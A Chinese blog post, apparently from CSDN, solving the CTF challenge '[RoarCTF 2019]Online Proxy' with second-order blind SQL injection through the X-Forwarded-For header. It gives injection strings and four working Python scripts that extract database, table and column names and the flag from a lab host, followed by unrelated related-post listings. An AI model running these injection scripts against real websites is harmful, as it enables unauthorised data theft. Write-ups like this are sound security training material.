BUUCTF--[RoarCTF 2019]Online Proxy

最新推荐文章于 2023-01-05 21:34:03 发布
最新推荐文章于 2023-01-05 21:34:03 发布
阅读量320 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/118892126
版权

 这里发现通过修改X-FORWARDED-FOR的值注释部分的内容也随之改变

 尝试盲注,上传命令时第一次为Current Ip发现并不能执行,再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行,再次send即可正常执行命令

 简单尝试使用盲注得到所有库名,这里可以看到该方法是没问题的

爆破库名:

0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

爆破表名:

0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

查列名:

0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

查Flag

0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),1,1))>1 or '0

import requests

url = "http://node4.buuoj.cn:26869/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)
Uzero.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[RoarCTF 2019]Online Proxy
m0_63045593的博客
04-22 1913
[RoarCTF 2019]Online Proxy <!-- Debug Info: Duration: 0.40283489227295 s Current Ip: 10.244.80.46 --> 看到ip联系一下 xff(识别ip的)可以自己修改 新知识点 一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。 跟SQL有关 挨个测试为单引号闭合 执行原理 数据在写入数据库时 1.127.0.0.1‘or’1在写入时为 Current
influx-proxy-2.5.7-linux-amd64.tar.gz
12-16
本文将详细探讨InfluxDB的核心特性和Influx-proxy的功能,并结合"Influx-proxy-2.5.7-linux-amd64.tar.gz"这个压缩包文件,解析其在Linux AMD64平台上可能的部署与使用。 首先,InfluxDB以其高效的存储和查询机制而...
kube-proxy-temp-1.16.8.yaml
10-09
aws-kube-proxy1.16.8版本示例文件
charles-proxy-4.6.2-win64.msi
01-02
Charles(charles-proxy-4.6.2-win64.msi官方下载试用30天Windows 64位版本) 是在您自己的计算机上运行的 Web 代理(HTTP 代理/ HTTP 监视器)。然后,您的网络浏览器(或任何其他互联网应用程序)被配置为通过 ...
sharding-proxy实现分表
04-18
接下来我们将深入探讨标题和描述中涉及的“sharding-proxy实现分表”这一主题。 ### 1. 分库分表介绍 分库分表是数据库水平扩展的一种常见策略,用于解决单表数据量过大导致的性能问题。随着业务的增长,数据量...
browsermob-proxy-2.1.4-bin.zip
07-24
代理服务器 BrowserMob Proxy,BrowserMob Proxy 简称 BMP,可以这么说,BMP 绝对是为 Selenium 为生的,Selenium + BMP 的完美搭配,可以实现很多你绝对想象不出来的功能
charles-proxy-4.5.6-win64.msi
12-21
charles-proxy-4.5.6-win64.msi
egg-http-proxy:鸡蛋的http代理
05-06
@ eggjs / http-proxy 一个基于egg httpclient的简单http代理。 安装 $ npm i @eggjs/http-proxy --save // {app_root}/config/plugin.js exports . httpProxy = { enable : true , package : '@eggjs/...
ios-webkit-debug-proxy-1.9.0-win64-bin
07-19
ios-webkit-debug-proxy-1.9.0-win64-bin
kube-proxy.rar
01-09
kube-proxy.rarkube-proxy.rarkube-proxy.rarkube-proxy.rar
dnscrypt-proxy:dnscrypt-proxy 多架构 docker 镜像
05-30
dnscrypt-proxy 多架构 docker 镜像 是一个灵活的 DNS 代理,支持加密的 DNS 协议。 架构 该镜像支持的架构是: linux/amd64 linux/arm64 linux/ppc64le linux/386 linux/arm/v7 linux/arm/v6 只需拉动...
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 624
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
[RoarCTF 2019]Online Proxy 盲注
scrawman的博客
01-26 3113
[RoarCTF 2019]Online Proxy bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。 盲注: import requests url = "http://node4.buuoj.cn:26940//" head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 964
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
Buuctf之Web(四)
qq_50589021的博客
11-22 1584
[HFCTF2020]JustEscape WP vm2沙盒逃逸 涉及到nodejs不会 [网鼎杯2018]Unfinish 脚本 # -*- coding: utf-8 -*- # @Author : Yn8rt # @Time : 2021/9/10 14:38 #coding:utf-8 import requests from bs4 import BeautifulSoup import time url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b
data-source-proxy-mode
最新发布
10-30
data-source-proxy-mode是一种数据源代理模式,用于管理和控制数据源的访问和使用。在现代应用程序开发中,往往需要同时连接和操作多个不同的数据源,例如数据库、API接口、文件系统等。而data-source-proxy-mode的作用就是提供一个统一的接口来管理这些数据源。 首先,data-source-proxy-mode可以实现数据源的动态切换。通过将不同的数据源注册到代理中,我们可以根据需要灵活地从已注册的数据源中选择。这样一来,我们可以根据实际情况选择最适合的数据源,如从数据库选择主数据库或从属数据库,或者从不同的API接口获取数据。 其次,data-source-proxy-mode还可以提供统一的数据访问接口。在开发过程中,不同的数据源可能有不同的访问方式和接口规范,而使用data-source-proxy-mode,我们可以通过同一套接口来访问和操作不同的数据源,避免了因数据源差异导致的开发和维护成本的增加。 此外,data-source-proxy-mode还能够提供对数据源访问的监控和管理功能。代理模式可以记录数据源的访问日志、统计数据源的使用情况、实施数据源的策略控制等。这些监控和管理功能可以帮助我们更好地了解和控制数据的流向和使用,提高数据的安全性和稳定性。 综上所述,data-source-proxy-mode是一种非常有用的数据源管理模式,可以帮助我们实现数据源的动态切换、提供统一的数据访问接口以及监控和管理数据源的访问和使用。在复杂的应用开发中,合理使用data-source-proxy-mode可以提高开发效率和数据管理的灵活性,减少因多样的数据源而带来的复杂性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值